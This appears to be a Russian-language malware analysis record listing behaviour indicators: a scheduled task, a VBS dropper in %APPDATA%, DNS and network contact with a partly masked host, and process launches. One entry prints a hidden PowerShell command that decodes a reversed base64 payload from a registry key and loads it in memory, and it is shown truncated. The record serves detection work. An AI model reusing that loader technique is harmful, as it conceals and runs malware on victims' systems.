Техническая информация
- <SYSTEM32>\tasks\cdkcfxqaiztpyku
- %APPDATA%\cdkcfxqaiztpyku.vbs
- 'co##############e-chains.prod.autograph.services.mozaws.net':443
- DNS ASK co##############e-chains.prod.autograph.services.mozaws.net
- '<SYSTEM32>\wscript.exe' "%APPDATA%\cDKCfXqAiZtpYku.VBS"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command $k='HKCU:\Software\cDKCfXqAiZtpYku';$n='test';$b=[Convert]::FromBase64String((-join((gp $k).$n |%{$_[-1..-($_.Length)]})));[AppDomain]::CurrentDomain.Load($b);[hem.... (со скрытым окном)
- '<SYSTEM32>\taskeng.exe' {0BD9570C-F8EF-4A60-9E94-C987CA76D0BB} S-1-5-21-3691498038-2086406363-2140527554-1000:hlnsabxv\user:Interactive:[1]
- '<SYSTEM32>\wscript.exe' "%APPDATA%\cDKCfXqAiZtpYku.VBS" (со скрытым окном)